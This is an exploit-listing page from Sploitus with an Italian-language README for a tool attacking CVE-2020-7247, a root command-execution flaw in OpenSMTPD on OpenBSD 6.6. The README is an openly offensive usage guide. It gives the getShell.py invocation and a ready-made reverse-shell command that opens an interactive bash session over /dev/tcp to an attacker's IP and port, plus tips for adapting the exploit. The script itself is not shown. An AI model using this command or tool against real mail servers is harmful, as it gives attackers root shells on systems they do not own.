Sploitus

Exploit for CVE-2020-7247

kitploit · 2026-08-25

Exploit Code

MARKDOWN20 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BYTESCRAPPERS-CVE-2020-7247
# CVE-2020-7247

Questa vulnerabilità esiste nella funzione “smtp_mailaddr()” del server di posta OpenSMTPD di OpenBSD, e interessa la versione 6.6 di OpenBSD. Ciò permette a un attaccante di eseguire comandi shell arbitrari come “sleep 66” come utente root.

### Come usare?

`python3 getShell.py <targetIp> <targetPort> <command>`

Se hai bisogno di una reverse shell, eseguilo così

`python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'`

## Importante

Modifica alcune cose in questo exploit come RCPT to e qualcos'altro (se necessario)

Vedi questo articolo per una spiegazione piĂą chiara

https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/